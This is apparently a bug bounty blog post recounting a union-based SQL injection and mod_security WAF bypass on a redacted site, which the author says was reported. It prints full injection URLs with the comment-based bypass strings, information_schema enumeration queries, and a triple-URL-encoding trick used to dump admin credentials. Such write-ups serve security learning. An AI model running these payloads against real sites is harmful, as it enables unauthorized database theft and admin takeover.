Hey WAF! Better Luck Next Time! 👽

Hello Everybody,

WHOAMI

Those who Don’t know me I am AkashRoxStarz, Third Year B-tech Computer science Student. I am Certified Ethical hacker,Security Researcher,Pentester And Part time bug hunter.This is my First blog post I am gonna share with you” UNION based SQL injection+ WAF Bypass — ->Admin panel login

What is SQLI?

An SQL injection attack is one of the most frequently occurring web hacking prevalent today, whereas an attacker uses web page inputs to insert a malicious code in SQL statements. It usually occurs when a web page asks for user input like username or ID The attacker uses this opportunity to insert a SQL statement which ends up running on your database without your knowledge.

SQL Injection

So Recently I was working on a private program, I was Trying to Escalate a Blind SSRF for Straight 3hours, and got fed up! so Took a small break, and opened my laptop again, This time I thought of having fun, so before Escalating my SSRF, I opened a New tab a started searching “Google dorks” for SQL injection, dork used: inurl:”.php?id=1

I was Going Through many sites, and randomly found a site say:Redacted.com having a responsible disclosure program, with my google dork, I found a URL like https://redacted.com/otherevent.php?id=1

So ,as per The First step I started To give Error, Singlecolon ‘ was used ,so the URL was like https://redacted.com/otherevent.php?id=1’ and response Was 500 internal domain Error!

500 Internal domain Error!

So Now I was trying to balance the Query to get the 200 response, so I just used — -to balance the query, so my Url now is https://redacted.com/otherevent.php?id=1' — -

and was Shocked to see the 200 response, I was like

It’s SQLI Time

So Now I confirmed That the site is vulnerable to SQL injection.

So very Quickly I Started to check No of columns in the database I used the following Command +ORDER+BY+10 so my Url was

https://redacted.com/otherevent.php?id=1'+ORDER+BY+10 — -

The site was Blanked-No response

https://redacted.com/otherevent.php?id=1'+ORDER+BY+9 — -

Got my 200 Response Back!

Now I started to check What were the Vulnerable Columns so I injected the following payload +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9

To Make the Query Balanced I gave a (-) minus Symbol next to ID=-1 (i.e) making LHS=RHS equally balanced

The URL was now

https://redacted.com/otherevent.php?id=-1' +UNION+ALL+SELECT+ 1,2,3,4,5,6,7,8,9 — -

The Respose was 406 Not Acceptable!

406 Not Acceptable!

The site was Protected with “Mod_security WAF”

So It’s Time to Bypass the WAF! I started with simple WAF bypass ,so first I tested With Preg_replace() method — — — -> BLOCKED

https://redacted.com/otherevent.php?id=-1' UNunionION+AlAL+SEselectLECT +1,2,3,4,5,6,7,8,9 — -

Next with whitespace Characters %0b — — — → BLOCKED

https://redacted.com/otherevent.php?id=-1' +uni%0bon+A%0bLL+se%0blect+ 1,2,3,4,5,6,7,8,9 — -

Next with Special Characters /*!+ — — — — ->BLOCKED

https://redacted.com/otherevent.php?id=-1' /*!+UNION+SELECT+ALL+*/ 1,2,3,4,5,6,7,8,9 — -

And Finally With Number and special Characters — — — -> BYPASSED!

String used to bypass+/*!50000

https://redacted.com/otherevent.php?id=-1' +/*!50000UNION+SELECT+ALL*/+ 1,2,3,4,5,6,7,8,9 — -

Now I was able to see the Vulnerable Column, It was No:3

Now I started inject the payload in no 3 to find “User,version,banner and Database name!”

There was No WAF Protected the strings,so I easily got the Database name!

https://redacted.com/otherevent.php?id=-1' +/*!50000UNION+SELECT+ALL*/+ 1,2,database(),4,5,6,7,8,9 — -

Database Name!

so Next Step is to list the tables in the database, so I injected the Query to get the tables

https://redacted.com/otherevent.php?id=-1' +/*!50000UNION+SELECT+ALL*/+ 1,2,group_concat(table_name),4,5,6,7,8,9from information_schema.tables where table_schema=database() — -

Again “WAF BLOCKED ME”

Again Tried with +/*!50000 strings — — — → Blocked!

Tried with +/*!13337 strings — — — — —> Blocked!

And Finally +/*!12345 strings — — — — -> Bypassed

Bypassed String Used: +/*!12345

https://redacted.com/otherevent.php?id=-1' +/*!50000UNION+SELECT+ALL*/+1,2,group_concat(table_name),4,5,6,7,8,9 /*!12345from*/ /*!12345 information_schema.tables*/ where table_schema=database() — -

Tables!

My Eyes Quickly Went to Admin, so I simply started Crawling the website and got a “ADMIN LOGIN PANEL” 😲

So Now My AIM was to get ADMIN CREDINTIALS and login into adminpanel so that we “Could Upload a backdoor ( .Php shell) and Could DEFACE THE WEBSITE TOO!”

And “Using The Same Bypass String I was Able to get the Columns List Too!”

https://redacted.com/otherevent.php?id=-1' +/*!50000UNION+SELECT+ALL*/+1,2,group_concat(column_name),4,5,6,7,8,9 /*!12345from*/ /*!12345 information_schema.columns*/ where table_schema=database() — -

Column list!

The Final Step was too Dump the data as I was Trying to Dump the data eg:banner,batch,Gallery, I was successfully able to dump the data

https://redacted.com/otherevent.php?id=-1' +/*!50000UNION+SELECT+ALL*/+1,2,group_concat(column_name),4,5,6,7,8,9 /*!12345from*/ /*!12345 information_schema.columns*/ where table_schema=’Gallery’ — -

Data dump!

But the Problem was Now With “dumping ADMIN DATA”

WAF was Blocking “ADMIN” string,

Again I tried with same above method to Bypass methods!

Again Tried with +/*!50000 strings — — — → Blocked!

Tried with +/*!13337 strings — — — — → Blocked!

Tried with +/*!12345 strings — — — — -> Blocked!

Tried with html <br> string — — — — → Blocked!

Tried with 0xHEX encoding — — — — → Blocked!

Tried with URL encoding — — — — — → Blocked!

Tried with Base64 encoding — — — — ->Blocked

Nothing Worked!

So I started going Again with Publicly disclosed Reports And Blogs for bypassing!

After an Hour Spent I came with an intresting blog where double URL encoding was bypassed!

So I started with Double encoding the “ADMIN” URL STRING but again BLOCKED!

“Finally I encoded the Double URL again to TRIPLE URL ENCODING, and was Suprised to see that it showed a 200 response! with admin username”

And Eventually I got the Password too!

Now I went to Admin panel and gave the Username and password!Boom!

I was Completely Excited over this Bypass,

Now I saw an Upload option In admin panel I could have Easily uploaded a .php shell and could have even defaced the website Too!

But that’s not the goal of an WHITE HAT HACKER! so I just started writing a good report with POC and submitted it!

Impact:

  • Full database Takeover
  • Bypass Admin Panel Login
  • Defacement Of Website too!

Bug Bounty tips:

If you are struck at Esclating a bug, Read as much as blogs and H1 reports, You will find beautiful methods and Bypasses overthere.

Let’s Get Chained! Follow me on Instagram:

https://www.instagram.com/akash_rox_starz_23/

Thanks a lot for reading my blog, Hit the Clap button if you enjoyed it 🙏, We will meet in next blog,until then signing off from now Master Akashroxstarz

Cheers, Happy hunting!

Security Researcher||Ethical Hacker||Penetration Tester||Try Hack me||Bug bounty hunter||

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store